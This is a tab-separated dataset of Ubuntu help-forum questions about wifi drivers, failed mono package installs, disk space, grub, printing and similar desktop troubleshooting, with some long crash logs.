516388	perfect alternative for tally erp 9	i want a perfect tally erp 9 alternative , that includes vouchers , ledgers , stats everything that tally erp 9 contains , came across many softwares like gnu cash , post books , bs1 accounting and so on ... but none suits perfect . my dad uses that to the fullest for accounting , and now we are upgrading our office pc to ubuntu , so tally is of damn use , can not trust wine either , poor interface and slow working . any help would be great ! thank you .
516389	ca n't connect to the internet wlan and lan not working	i have installed a fresh copy of ubuntu on toshiba c655d-s5300 and could n't get connected to internet . i have tried to follow the same direction with the previously asked questions of installing a driver but it still could n't detect the wifi and i 'm still getting no network device available message . below is my realtek adapter . if any one could please help me to get connected to the internet ! lspci -nn | grep network 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec:8176 ] ( rev 01 )
516392	is it possible to launch an application on a remote pc using the terminal ?	i found myself away from my computer needing to do some quick work that required my accessing my desktop remotely . i normally use teamviewer , but i do n't have it load on boot . i can launch it from the terminal just by typing teamviewer while sitting at my computer . when i try it logged in through ssh , nothing actually loads . is it possible to force an app to load on the ssh server ?
516393	apt-get and dpkg not working due to mono-complete	after installing the mono-complete package , no matter what i do in apt-get and dpkg , even apt-get -f install and the likes , except for apt-get update , i always get the following errors : setting up libnunit2.6-cil ( 2.6.0.12051+dfsg-2 ) ... * installing 5 assemblies from libnunit2.6-cil into mono native stacktrace : /usr/bin/mono ( ) [ 0x8105b4a ] [ 0xb776440c ] [ 0xb7764424 ] /lib/i386-linux-gnu/libc.so.6 ( gsignal+0x47 ) [ 0xb7554937 ] /lib/i386-linux-gnu/libc.so.6 ( abort+0x143 ) [ 0xb7557d63 ] /usr/bin/mono ( ) [ 0x8288b23 ] /usr/bin/mono ( ) [ 0x8288bb3 ] /usr/bin/mono ( ) [ 0x816b519 ] /usr/bin/mono ( mono_class_get_full+0xff ) [ 0x816bdff ] /usr/bin/mono ( mono_class_from_name+0x107 ) [ 0x816c237 ] /usr/bin/mono ( ) [ 0x81f25c9 ] /usr/bin/mono ( ) [ 0x806b2b8 ] /usr/bin/mono ( mono_main+0x31b ) [ 0x80d7c2b ] /usr/bin/mono ( ) [ 0x805e1e8 ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf3 ) [ 0xb753fa83 ] /usr/bin/mono ( ) [ 0x805e398 ] debug info from gdb : native stacktrace : /usr/bin/mono ( ) [ 0x8105b4a ] [ 0xb777f40c ] [ 0xb777f424 ] /lib/i386-linux-gnu/libc.so.6 ( gsignal+0x47 ) [ 0xb756f937 ] /lib/i386-linux-gnu/libc.so.6 ( abort+0x143 ) [ 0xb7572d63 ] /usr/bin/mono ( ) [ 0x8288b23 ] /usr/bin/mono ( ) [ 0x8288bb3 ] /usr/bin/mono ( ) [ 0x816b519 ] /usr/bin/mono ( mono_class_get_full+0xff ) [ 0x816bdff ] /usr/bin/mono ( mono_class_from_name+0x107 ) [ 0x816c237 ] /usr/bin/mono ( ) [ 0x81f25c9 ] /usr/bin/mono ( ) [ 0x806b2b8 ] /usr/bin/mono ( mono_main+0x31b ) [ 0x80d7c2b ] /usr/bin/mono ( ) [ 0x805e1e8 ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf3 ) [ 0xb755aa83 ] /usr/bin/mono ( ) [ 0x805e398 ] debug info from gdb : [ thread debugging using libthread_db enabled ] using host libthread_db library `` /lib/i386-linux-gnu/libthread_db.so.1 '' . [ thread debugging using libthread_db enabled ] using host libthread_db library `` /lib/i386-linux-gnu/libthread_db.so.1 '' . 0xb7764424 in __kernel_vsyscall ( ) id target id frame * 1 thread 0xb7524740 ( lwp 21875 ) `` mono '' 0xb7764424 in __kernel_vsyscall ( ) thread 1 ( thread 0xb7524740 ( lwp 21875 ) ) : # 0 0xb7764424 in __kernel_vsyscall ( ) # 1 0xb76e4cb3 in __waitpid_nocancel ( ) at ../sysdeps/unix/syscall-template.s:81 0xb777f424 in __kernel_vsyscall ( ) id target id frame * 1 thread 0xb753f740 ( lwp 21878 ) `` mono '' 0xb777f424 in __kernel_vsyscall ( ) thread 1 ( thread 0xb753f740 ( lwp 21878 ) ) : # 0 0xb777f424 in __kernel_vsyscall ( ) # 1 0xb76ffcb3 in __waitpid_nocancel ( ) at ../sysdeps/unix/syscall-template.s:81 # 2 0x08105bf1 in mono_handle_native_sigsegv ( signal=6 , ctx=0xbfc9050c ) at mini-exceptions.c:2299 # 3 < signal handler called > # 4 0xb7764424 in __kernel_vsyscall ( ) # 5 0xb7554937 in __gi_raise ( sig=sig @ entry=6 ) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 # 6 0xb7557d63 in __gi_abort ( ) at abort.c:89 # 7 0x08288b23 in monoeg_g_logv ( log_domain=log_domain @ entry=0x0 , log_level=log_level @ entry=g_log_level_error , format=format @ entry=0x8292648 `` * assertion at % s : % d , condition ` % s ' not met\n '' , args=args @ entry=0xbfc909c4 `` \211\363*\bp\026 '' ) at goutput.c:175 # 2 0x08105bf1 in mono_handle_native_sigsegv ( signal=6 , ctx=0xbfaf958c ) at mini-exceptions.c:2299 # 3 < signal handler called > # 4 0xb777f424 in __kernel_vsyscall ( ) # 5 0xb756f937 in __gi_raise ( sig=sig @ entry=6 ) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 # 6 0xb7572d63 in __gi_abort ( ) at abort.c:89 # 7 0x08288b23 in monoeg_g_logv ( log_domain=log_domain @ entry=0x0 , log_level=log_level @ entry=g_log_level_error , format=format @ entry=0x8292648 `` * assertion at % s : % d , condition ` % s ' not met\n '' , args=args @ entry=0xbfaf9a64 `` \211\363*\bp\026 '' ) at goutput.c:175 # 8 0x08288bb3 in monoeg_assertion_message ( format=format @ entry=0x8292648 `` * assertion at % s : % d , condition ` % s ' not met\n '' ) at goutput.c:195 # 9 0x0816b519 in mono_class_create_from_typedef ( image=image @ entry=0x979b218 , type_token=type_token @ entry=33554477 , error=error @ entry=0xbfc90a98 ) at class.c:5744 # 10 0x0816bdff in mono_class_get_full ( image=0x979b218 , type_token=33554477 , context=0x0 ) at class.c:7098 # 11 0x0816c237 in mono_class_get ( type_token=33554477 , image=0x979b218 ) at class.c:7194 # 12 mono_class_from_name ( image=0x979b218 , name_space=name_space @ entry=0x829395c `` system '' , name=name @ entry=0x829523c `` array '' ) at class.c:7565 # 8 0x08288bb3 in monoeg_assertion_message ( format=format @ entry=0x8292648 `` * assertion at % s : % d , condition ` % s ' not met\n '' ) at goutput.c:195 # 13 0x081f25c9 in mono_init_internal ( filename=filename @ entry=0xbfc91831 `` /usr/share/mono/monogetassemblyname.exe '' , exe_filename=exe_filename @ entry=0xbfc91831 `` /usr/share/mono/monogetassemblyname.exe '' , runtime_version=runtime_version @ entry=0x0 ) at domain.c:1512 # 9 0x0816b519 in mono_class_create_from_typedef ( image=image @ entry=0x9f4fa98 , type_token=type_token @ entry=33554477 , error=error @ entry=0xbfaf9b38 ) at class.c:5744 # 14 0x081f34cf in mono_init_from_assembly ( domain_name=domain_name @ entry=0xbfc91831 `` /usr/share/mono/monogetassemblyname.exe '' , filename=filename @ entry=0xbfc91831 `` /usr/share/mono/monogetassemblyname.exe '' ) at domain.c:1723 # 10 0x0816bdff in mono_class_get_full ( image=0x9f4fa98 , type_token=33554477 , context=0x0 ) at class.c:7098 # 11 0x0816c237 in mono_class_get ( type_token=33554477 , image=0x9f4fa98 ) at class.c:7194 # 15 0x0806b2b8 in mini_init ( filename=0xbfc91831 `` /usr/share/mono/monogetassemblyname.exe '' , runtime_version=runtime_version @ entry=0x0 ) at mini.c:7258 # 16 0x080d7c2b in mono_main ( argc=argc @ entry=3 , argv=argv @ entry=0xbfc91224 ) at driver.c:1896 # 12 mono_class_from_name ( image=0x9f4fa98 , name_space=name_space @ entry=0x829395c `` system '' , name=name @ entry=0x829523c `` array '' ) at class.c:7565 # 17 0x0805e1e8 in mono_main_with_options ( argv=0xbfc91224 , argc=3 ) at main.c:91 # 18 main ( argc=3 , argv=0xbfc91224 ) at main.c:122 ================================================================= got a sigabrt while executing native code . this usually indicates a fatal error in the mono runtime or one of the native libraries used by your application . ================================================================= # 13 0x081f25c9 in mono_init_internal ( filename=filename @ entry=0xbfafb827 `` /usr/lib/mono/4.5/gacutil.exe '' , exe_filename=exe_filename @ entry=0xbfafb827 `` /usr/lib/mono/4.5/gacutil.exe '' , runtime_version=runtime_version @ entry=0x0 ) at domain.c:1512 # 14 0x081f34cf in mono_init_from_assembly ( domain_name=domain_name @ entry=0xbfafb827 `` /usr/lib/mono/4.5/gacutil.exe '' , filename=filename @ entry=0xbfafb827 `` /usr/lib/mono/4.5/gacutil.exe '' ) at domain.c:1723 # 15 0x0806b2b8 in mini_init ( filename=0xbfafb827 `` /usr/lib/mono/4.5/gacutil.exe '' , runtime_version=runtime_version @ entry=0x0 ) at mini.c:7258 # 16 0x080d7c2b in mono_main ( argc=argc @ entry=4 , argv=argv @ entry=0xbfafa2c4 ) at driver.c:1896 # 17 0x0805e1e8 in mono_main_with_options ( argv=0xbfafa2c4 , argc=4 ) at main.c:91 # 18 main ( argc=4 , argv=0xbfafa2c4 ) at main.c:122 ================================================================= got a sigabrt while executing native code . this usually indicates a fatal error in the mono runtime or one of the native libraries used by your application . ================================================================= aborted ( core dumped ) aborted ( core dumped ) e : installing assembly /usr/lib/cli/nunit.core-2.6/nunit.core.dll failed e : installation of libnunit2.6-cil with /usr/share/cli-common/runtimes.d/mono failed no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . dpkg : error processing package libnunit2.6-cil ( -- configure ) : subprocess installed post-installation script returned error exit status 29 dpkg : dependency problems prevent configuration of libnunit-cil-dev : libnunit-cil-dev depends on libnunit2.6-cil ( = 2.6.0.12051+dfsg-2 ) ; however : package libnunit2.6-cil is not configured yet . dpkg : error processing package libnunit-cil-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libmono-cil-dev : libmono-cil-dev depends on libnunit-cil-dev ( > = 2.4 ) ; however : package libnunit-cil-dev is not configured yet . dpkg : error processing package libmono-cil-dev ( -- configure ) : dependency problems - leaving unconfigured setting up libwebkit1.1-cil ( 0.3-6 ) ... * installing 1 assembly from libwebkit1.1-cil into mono native stacktrace : /usr/bin/mono ( ) [ 0x8105b4a ] [ 0xb775a40c ] [ 0xb775a424 ] /lib/i386-linux-gnu/libc.so.6 ( gsignal+0x47 ) [ 0xb754a937 ] /lib/i386-linux-gnu/libc.so.6 ( abort+0x143 ) [ 0xb754dd63 ] /usr/bin/mono ( ) [ 0x8288b23 ] /usr/bin/mono ( ) [ 0x8288bb3 ] /usr/bin/mono ( ) [ 0x816b519 ] /usr/bin/mono ( mono_class_get_full+0xff ) [ 0x816bdff ] /usr/bin/mono ( mono_class_from_name+0x107 ) [ 0x816c237 ] /usr/bin/mono ( ) [ 0x81f25c9 ] /usr/bin/mono ( ) [ 0x806b2b8 ] /usr/bin/mono ( mono_main+0x31b ) [ 0x80d7c2b ] /usr/bin/mono ( ) [ 0x805e1e8 ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf3 ) [ 0xb7535a83 ] /usr/bin/mono ( ) [ 0x805e398 ] debug info from gdb : native stacktrace : /usr/bin/mono ( ) [ 0x8105b4a ] [ 0xb77a840c ] [ 0xb77a8424 ] /lib/i386-linux-gnu/libc.so.6 ( gsignal+0x47 ) [ 0xb7598937 ] /lib/i386-linux-gnu/libc.so.6 ( abort+0x143 ) [ 0xb759bd63 ] /usr/bin/mono ( ) [ 0x8288b23 ] /usr/bin/mono ( ) [ 0x8288bb3 ] /usr/bin/mono ( ) [ 0x816b519 ] /usr/bin/mono ( mono_class_get_full+0xff ) [ 0x816bdff ] /usr/bin/mono ( mono_class_from_name+0x107 ) [ 0x816c237 ] /usr/bin/mono ( ) [ 0x81f25c9 ] /usr/bin/mono ( ) [ 0x806b2b8 ] /usr/bin/mono ( mono_main+0x31b ) [ 0x80d7c2b ] /usr/bin/mono ( ) [ 0x805e1e8 ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf3 ) [ 0xb7583a83 ] /usr/bin/mono ( ) [ 0x805e398 ] debug info from gdb : [ thread debugging using libthread_db enabled ] using host libthread_db library `` /lib/i386-linux-gnu/libthread_db.so.1 '' . [ thread debugging using libthread_db enabled ] using host libthread_db library `` /lib/i386-linux-gnu/libthread_db.so.1 '' . 0xb775a424 in __kernel_vsyscall ( ) id target id frame * 1 thread 0xb751a740 ( lwp 21898 ) `` mono '' 0xb775a424 in __kernel_vsyscall ( ) thread 1 ( thread 0xb751a740 ( lwp 21898 ) ) : # 0 0xb775a424 in __kernel_vsyscall ( ) # 1 0xb76dacb3 in __waitpid_nocancel ( ) at ../sysdeps/unix/syscall-template.s:81 # 2 0x08105bf1 in mono_handle_native_sigsegv ( signal=6 , ctx=0xbfc0730c ) at mini-exceptions.c:2299 # 3 < signal handler called > # 4 0xb775a424 in __kernel_vsyscall ( ) # 5 0xb754a937 in __gi_raise ( sig=sig @ entry=6 ) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 # 6 0xb754dd63 in __gi_abort ( ) at abort.c:89 # 7 0x08288b23 in monoeg_g_logv ( log_domain=log_domain @ entry=0x0 , log_level=log_level @ entry=g_log_level_error , format=format @ entry=0x8292648 `` * assertion at % s : % d , condition ` % s ' not met\n '' , args=args @ entry=0xbfc077b4 `` \211\363*\bp\026 '' ) at goutput.c:175 0xb77a8424 in __kernel_vsyscall ( ) id target id frame * 1 thread 0xb7568740 ( lwp 21901 ) `` mono '' 0xb77a8424 in __kernel_vsyscall ( ) thread 1 ( thread 0xb7568740 ( lwp 21901 ) ) : # 0 0xb77a8424 in __kernel_vsyscall ( ) # 1 0xb7728cb3 in __waitpid_nocancel ( ) at ../sysdeps/unix/syscall-template.s:81 # 2 0x08105bf1 in mono_handle_native_sigsegv ( signal=6 , ctx=0xbfe3fb8c ) at mini-exceptions.c:2299 # 3 < signal handler called > # 4 0xb77a8424 in __kernel_vsyscall ( ) # 5 0xb7598937 in __gi_raise ( sig=sig @ entry=6 ) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 # 6 0xb759bd63 in __gi_abort ( ) at abort.c:89 # 8 0x08288bb3 in monoeg_assertion_message ( format=format @ entry=0x8292648 `` * assertion at % s : % d , condition ` % s ' not met\n '' ) at goutput.c:195 # 7 0x08288b23 in monoeg_g_logv ( log_domain=log_domain @ entry=0x0 , log_level=log_level @ entry=g_log_level_error , format=format @ entry=0x8292648 `` * assertion at % s : % d , condition ` % s ' not met\n '' , args=args @ entry=0xbfe40044 `` \211\363*\bp\026 '' ) at goutput.c:175 # 9 0x0816b519 in mono_class_create_from_typedef ( image=image @ entry=0x939b218 , type_token=type_token @ entry=33554477 , error=error @ entry=0xbfc07888 ) at class.c:5744 # 10 0x0816bdff in mono_class_get_full ( image=0x939b218 , type_token=33554477 , context=0x0 ) at class.c:7098 # 11 0x0816c237 in mono_class_get ( type_token=33554477 , image=0x939b218 ) at class.c:7194 # 12 mono_class_from_name ( image=0x939b218 , name_space=name_space @ entry=0x829395c `` system '' , name=name @ entry=0x829523c `` array '' ) at class.c:7565 # 8 0x08288bb3 in monoeg_assertion_message ( format=format @ entry=0x8292648 `` * assertion at % s : % d , condition ` % s ' not met\n '' ) at goutput.c:195 # 9 0x0816b519 in mono_class_create_from_typedef ( image=image @ entry=0x9e92a98 , type_token=type_token @ entry=33554477 , error=error @ entry=0xbfe40118 ) at class.c:5744 # 10 0x0816bdff in mono_class_get_full ( image=0x9e92a98 , type_token=33554477 , context=0x0 ) at class.c:7098 # 11 0x0816c237 in mono_class_get ( type_token=33554477 , image=0x9e92a98 ) at class.c:7194 # 13 0x081f25c9 in mono_init_internal ( filename=filename @ entry=0xbfc0882c `` /usr/share/mono/monogetassemblyname.exe '' , exe_filename=exe_filename @ entry=0xbfc0882c `` /usr/share/mono/monogetassemblyname.exe '' , runtime_version=runtime_version @ entry=0x0 ) at domain.c:1512 # 14 0x081f34cf in mono_init_from_assembly ( domain_name=domain_name @ entry=0xbfc0882c `` /usr/share/mono/monogetassemblyname.exe '' , filename=filename @ entry=0xbfc0882c `` /usr/share/mono/monogetassemblyname.exe '' ) at domain.c:1723 # 12 mono_class_from_name ( image=0x9e92a98 , name_space=name_space @ entry=0x829395c `` system '' , name=name @ entry=0x829523c `` array '' ) at class.c:7565 # 15 0x0806b2b8 in mini_init ( filename=0xbfc0882c `` /usr/share/mono/monogetassemblyname.exe '' , runtime_version=runtime_version @ entry=0x0 ) at mini.c:7258 # 13 0x081f25c9 in mono_init_internal ( filename=filename @ entry=0xbfe42822 `` /usr/lib/mono/4.5/gacutil.exe '' , exe_filename=exe_filename @ entry=0xbfe42822 `` /usr/lib/mono/4.5/gacutil.exe '' , runtime_version=runtime_version @ entry=0x0 ) at domain.c:1512 # 16 0x080d7c2b in mono_main ( argc=argc @ entry=3 , argv=argv @ entry=0xbfc08014 ) at driver.c:1896 # 14 0x081f34cf in mono_init_from_assembly ( domain_name=domain_name @ entry=0xbfe42822 `` /usr/lib/mono/4.5/gacutil.exe '' , filename=filename @ entry=0xbfe42822 `` /usr/lib/mono/4.5/gacutil.exe '' ) at domain.c:1723 # 17 0x0805e1e8 in mono_main_with_options ( argv=0xbfc08014 , argc=3 ) at main.c:91 # 18 main ( argc=3 , argv=0xbfc08014 ) at main.c:122 # 15 0x0806b2b8 in mini_init ( filename=0xbfe42822 `` /usr/lib/mono/4.5/gacutil.exe '' , runtime_version=runtime_version @ entry=0x0 ) at mini.c:7258 # 16 0x080d7c2b in mono_main ( argc=argc @ entry=4 , argv=argv @ entry=0xbfe408a4 ) at driver.c:1896 # 17 0x0805e1e8 in mono_main_with_options ( argv=0xbfe408a4 , argc=4 ) at main.c:91 # 18 main ( argc=4 , argv=0xbfe408a4 ) at main.c:122 ================================================================= got a sigabrt while executing native code . this usually indicates a fatal error in the mono runtime or one of the native libraries used by your application . ================================================================= ================================================================= got a sigabrt while executing native code . this usually indicates a fatal error in the mono runtime or one of the native libraries used by your application . ================================================================= aborted ( core dumped ) aborted ( core dumped ) e : installing assembly /usr/lib/cli/webkit-sharp-1.1/webkit-sharp.dll failed e : installation of libwebkit1.1-cil with /usr/share/cli-common/runtimes.d/mono failed no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : error processing package libwebkit1.1-cil ( -- configure ) : subprocess installed post-installation script returned error exit status 29 dpkg : dependency problems prevent configuration of mono-devel : mono-devel depends on libmono-cil-dev ( = 3.2.8+dfsg-4ubuntu1 ) ; however : package libmono-cil-dev is not configured yet . dpkg : error processing package mono-devel ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of monodoc-browser : monodoc-browser depends on libwebkit1.1-cil ( > = 0.3 ) ; however : package libwebkit1.1-cil is not configured yet . dpkg : error processing package monodoc-browser ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of monodoc-manual : monodoc-manual depends on monodoc-browser | monodoc-http | monodoc-viewer ; however : package monodoc-browser is not configured yet . package monodoc-http is not installed . package monodoc-viewer is not installed . package monodoc-browser which provides monodoc-viewer is not configured yet . dpkg : error processing package monodoc-manual ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libnunit2.6-cil libnunit-cil-dev libmono-cil-dev libwebkit1.1-cil mono-devel monodoc-browser monodoc-manual nothing works . how do i fix this ?
516395	webcam infrared remote control	i want to know if it 's at all possible to create software to allow a normal webcam to interpret the signals from an ir remote control . i know that webcams can pick up the infrared signals and show them on the screen . i also know about how to hack a webcam to create an ir camera . but it seems to me that if a webcam already receives ir , all one would need to do is teach it how to interpret that . any thoughts ?
516397	detecting very low wifi strength compared to other pc 's	i 'm using trusty and my pc does n't detect wifi strength properly . where other pc 's show a strength of 2-3 mine shows 0-1 how should i get over this problem ?
516399	vlc http interface keep asking password	i am trying to control vlc from browser or my android phone . i read wiki vlc . and i believe i did everthing right . enabled http interface , set a password . but when i go to localhost:8080 browser asks me username and password and i write and it asks me over and over again . eventually i hit `` esc '' and 401 unauthorized come up . i left username blank and tried `` dummy '' too but nothing changed . i tried both vlc 2.1.4 and vlc nightly build i am using ubuntu 14.04 thanks for help
516400	how can i increase space in /home , ubuntu 14.04	my current disk uage is as : $ : df -h filesystem size used avail use % mounted on /dev/sdd2 1.4t 13g 1.3t 1 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 30g 4.0k 30g 1 % /dev tmpfs 5.9g 1.9m 5.9g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 30g 152k 30g 1 % /run/shm none 100m 44k 100m 1 % /run/user /dev/sdd4 184g 159g 16g 92 % /home and my /home directly is nearly full , is any means i can use space under '/ ' to increase my '/home ' directory ? thanks edit : as requested , i post the output of sudo parted -l : fhwa @ fhwa : ~ $ sudo parted -l model : ata st3500514ns ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 106mb 105mb primary ntfs boot 2 106mb 500gb 500gb primary ntfs error : invalid argument during seek for read on /dev/sdb retry/ignore/cancel ? retry error : invalid argument during seek for read on /dev/sdb retry/ignore/cancel ? i error : the backup gpt table is corrupt , but the primary appears ok , so that will be used . ok/cancel ? ok/cancel ? o backtrace has 8 calls on stack : 8 : /lib/x86_64-linux-gnu/libparted.so.0 ( ped_assert+0x31 ) [ 0x7fa918be54b1 ] 7 : /lib/x86_64-linux-gnu/libparted.so.0 ( +0x3f5f6 ) [ 0x7fa918c155f6 ] 6 : /lib/x86_64-linux-gnu/libparted.so.0 ( ped_disk_new+0x49 ) [ 0x7fa918beaf99 ] 5 : parted ( ) [ 0x406dff ] 4 : parted ( ) [ 0x407bda ] 3 : parted ( main+0x154b ) [ 0x4065cb ] 2 : /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0x7fa9183c2ec5 ] 1 : parted ( ) [ 0x406617 ] you found a bug in gnu parted ! here 's what you have to do : do n't panic ! the bug has most likely not affected any of your data . help us to fix this bug by doing the following : check whether the bug has already been fixed by checking the last version of gnu parted that you can find at : http : //ftp.gnu.org/gnu/parted/ please check this version prior to bug reporting . if this has not been fixed yet or if you do n't know how to check , please visit the gnu parted website : http : //www.gnu.org/software/parted for further information . your report should contain the version of this release ( 2.3 ) along with the error message below , the output of parted device unit co print unit s print and the following history of commands you entered . also include any additional information about your setup you consider important . assertion ( last_usable < = disk- > dev- > length ) at ../../../libparted/labels/gpt.c:994 in function _parse_header ( ) failed .
516402	14.04 only works through recovery though badly	since i upgraded from 12.04 to 14.04 i ca n't boot in any other mode than through recovery mode . if i do n't , the mouse hardly works then freezes , same for keyboard . still , after using the recovery mode my pc works but operating any function is very slow and it sometimes freezes . i had a lot of freezing incidents when still using the 12.04 , so when the problem i describe above came up after the upgrade , i decided to wipe my hard drive clean with dban to make sure nothing would be carried over and then downloaded 14.04 from a usb drive ... with the same results . the dpkg option on the recovery menu highlighted a series of errors that i 'll be happy to post if anyone asks . i also got a few pop-ups early after the download warning me about problems with programs such as compiz , webapp-container or aptdaemon , among other glitches . if you could let me know how i should handle this , i 'll be very grateful indeed ! fred
516404	wifi hardware blocked on lenovo g50-30	i own a lenovo g50-30 with ubuntu 14.04 ( x32 ) . i have just a little problem with my wifi . when i tried : sudo rfkill list get result as , 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : yes 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : yes even though it shows bluetooth hardblocked , bluetooth functions as normal. ? i checked the harware switch , it is ok . i am using wireless connection in windows . any soluton ? ?
516405	ubuntu 14.04 not booting properly even from live cd	i 've installed ubuntu 14.04 on my pre installed windows 8 laptop and it was running great . but suddenly i 'm facing this problem . when ever i turn on/restart my laptop from last ubuntu uses/ubuntu it goes to uefi settings instead of showing grub menu ( but if i turn on/restart from windows grub menu shows ) . from uefi menu if i press f10 grub menu loads and if i select ubuntu it starts with some same repeating white text like ^ [ [ [ [ b^ [ [ [ [ [ b^ [ [ [ [ b ... on a black screen if i press esc immediately system loads properly but if i keep it like this it hangs there . same things happen with live cd . so i uninstall ubuntu by formatting my ubuntu partition in order to make a fresh install . but the problem with ubuntu live cd still exist even with other version of ubuntu cd ( lucid ) . so i guess if i make a fress install it will remain like this . i dont know how can i solve this . please help . laptop : amd-a8 , radeon hd
516406	ubuntu 14.04 disable automatic network connection until after login	so i recently connected to my university 's network for the first time using ubuntu . after configuring it to correctly work with peap , it will now prompt me to login using my credentials on the login screen . the credentials are stored somewhere within my user account - once i log in to my account ubuntu will automatically connect seamlessly to the network . how do i disable this prompt from appearing on the login screen ? it always seems to pop up right as i am trying to type in the last few characters of my password and throws me off . i still want to have ubuntu automatically connect to the network once i have logged in .
516407	wifi usb adapter	i installed abuntu linux 14.04 and i am not able to connect to wifi . i put the installation disk for the wi-fi adapter in . it dosent open the installation package like it would on windows xp . it shows the disk icon , but when i open it its just a bunch of files . please help . linksy usb adapter i dont know where alot of stuff is on this software so please give details on where stuff is
516409	how to type special character on ubuntu	a bit silly , but i ca n't type this character ŕ˛ , on ubuntu . some page say it should be this way ctrl+shift type u0ca0 but it doesnt do anything . even i find a shortcut for sublime that i did n't know that exist before try this .
516410	file encryption program for all platforms	i need to encrypt files and folders in ubuntu . i know there are lots of programs that can do that , but i would like to be able to open the encrypted files on other platforms too . i should be possible to open the files on linux , windows , android and so on . is there a encryption program that exists on all these platforms or at least a method to open decrypt the file on other platforms ?
516412	huappauge hd pvr setup ubuntu 14.04 , drivers working can not record	im trying to get my huappauge hd pvr to work in ubuntu 14.04 , it picks it up when i type dmesg in terminal . however when i go to record something using cat /dev/video1 > /home/matty/videos/test.ts ( the pvr is video1 and my webcam is video0 ) i get this error : cat : /dev/video1 : input/output error can anyone help me with this as i have no idea what the problem is .
516414	up grading from 12.04	i am trying to follow your procedure to install on a none pae machine . 12.04 installed ok but when i tried to get update to move to 13 i get an error : err upgrade tool signature 404 not found [ ip : 91.189.88.149 80 ] i have done this before and it always worked any help would be appreciated .
516418	14.04 simple scan no longer starts , 'segmentation fault ' when run in terminal	i can no longer run simple-scan on 14.04 under kernel 3.13.0-34-generic . it quits before the ui loads and when i run simple-scan from terminal i get a segmentation fault . it 's such a useful tool for me and i 'm annoyed because it used to work perfectly . all i have changed recently ( other than routine dist-upgrades ) was 'dpkg -- add-architecture i386 ' to get the latest version of crossover running . any ideas ? i 'm temporarily using 'gscan2pdf ' which is ok but really slows down my workflow when compared to simple scan . thanks in advance !
516423	how to install wine on ubuntu 14.04 ?	i am a windows user , and i do n't know nothing about ubuntu and how does it works . i do n't know how to access my computer , i do n't know how to access command prompt nothing . just now i installed ubuntu 14.04 lts , due to wifi problem i reinstalled ubuntu and now the wifi is working fine . now i am not able to install any of the exe file . i am trying to install file zilla , internet download manager , 7zip , and as a blogger i would like to install some other blogging related tools which install on adobe air . can any one please help me and instruct me in detail step by step on how to install wine on ubuntu 14.04 . or are there any other programs which makes to install windows related applications .
516427	how to force shotwell re-read metadata from images ?	i have some odd behavior of shotwell : some of my ratings of a recent event photos have disappeared from the shotwell 's database . most of the photos that i had rated two stars are listed as not rated in shotwell . however the file of the photo does say `` rating 2 '' , and digikam as well confirms the rating is 2 when i reload the metadata from the photos . is there a way to force shotwell to re-read the metadata from the photos and overwrite what 's in the database ? thank you !
516429	wi-fi help linux abuntu 14.04	i have a wireless usb adapter . its a linksy adapter . i have the disc for it to install it . i put it in my computer and it didnt open a installation wizard . but , there is a disk icon and when i open it , it is just a bunch of files . please help i have no idea what to do . and dont know where alot of stuff is on linux.so if you answer please give me details on where to go and what to do . ( i do not have a wifi card )
516434	i can not print from ubuntu because it does not have linux driver installed . is there a way around this ?	i am unsure of what i need to do and how to complete this task . i want to be able to print ubuntu 14.0.4 ( virtual box ) to my company 's sharp mx-2615 printer . ubuntu can not find a driver for this particular unit during printer setup , but i discovered that there is a linux ppd software and ppd driver on the sharp website . which one do i need to install ?
516436	change grub setting from readonly to normal	yesterday , i had installed ubuntu desktop in my system which already had windows xp . after installation , when i restart the computer only ubuntu is getting started as the timeout is set to 10 second only . and by the time my keyboard get unable the os ubuntu > get start up . hence i try to change the timeout in in /etc/default/grub . but i am unable to change as it say it is write-protected . how do i change this setting ?
516438	error while installing latest ubuntu os	while i was in the middle of installing the latest ubuntu operating system some error came up ( i ca n't remember what it said exactly ) but i was prompted to restart my laptop . now when i start my laptop it briefly flashes my hewlett-packard start screen then it goes straight to a black screen with a blinking underscore in the top left corner . i can get to the pheonixbios screen and have tried booting from the disk , but nothing seems to be working . does anyone have any suggestions for me to try ? any help would be appreciated .
516442	destroyed fstab file by mistake ! need to restore it	i destroyed by mistype the fstab file in an ubuntu 12.04 server . does anybody know , how can i restore it with the correct values ?
516444	loading startup script files after vmlinuz is being loaded on trusty tahr	may i know step by step in loading startup script files after vmlinuz kernel is being loaded on trusty tahr ?
